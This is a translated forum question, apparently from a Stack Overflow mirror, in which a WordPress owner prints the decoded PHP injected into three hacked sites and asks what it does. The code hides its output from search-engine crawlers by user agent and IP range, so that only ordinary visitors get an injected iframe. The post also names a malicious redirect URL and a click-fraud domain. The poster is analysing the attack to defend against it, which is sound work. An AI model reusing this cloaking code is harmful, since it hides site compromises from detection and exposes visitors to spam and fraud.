If you are not redirected within 2 seconds click here to continue |
Wordpress взломан: что на самом деле делает этот сценарий?
Я веду три блога на wordpress, и вчера утром все они были взломаны.
Во всех моих index.php первая строка выглядела следующим образом:
Помимо исправления (которое, похоже, сработало), мне интересно, что он делает и с какой целью.
Итак. Я расшифровал вставленный код:
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '';
}
Примерно, если я правильно понимаю, он покажет дополнительный iframe с некоторым источником, который нужно будет загрузить, но только если пользовательский агент и ip не находятся в список заблокированных IP-адресов или заблокированных ботов. Я предполагаю: чтобы убедиться, что мой сайт не будет занесен в черный список, но все посетители будут получать спам.
Но мне все еще было любопытно: что он на самом деле делает?
Поэтому я перешел по ссылке на http: //wumpearpmy.cz.cc/go/1 с помощью RestClient и получить следующий HTML-код:
http://groupon.be
Хорошо. Я могу прочитать groupon.com , но я предполагаю, что это просто подделка (слишком очевидно?), И он проверит наличие cookie? Какой файл cookie? Я не мог сразу это сделать. И он будет опубликован в течение двух секунд на clicks.maximumspeedfind.com . Я не пытался этого сделать.
Много кода, чтобы убедиться, что окно остается маленьким, почти невидимым. Но, похоже, также много запутанного кода.
Может кто-нибудь просветить меня, что они здесь пытаются сделать? И как?
Это чьи-то показатели кликабельности, которые они пытаются подделать? (возможно, наивно).
10
задан AstroCB 19 August 2014 в 02:55
поделиться
0 ответов
Другие вопросы по тегам: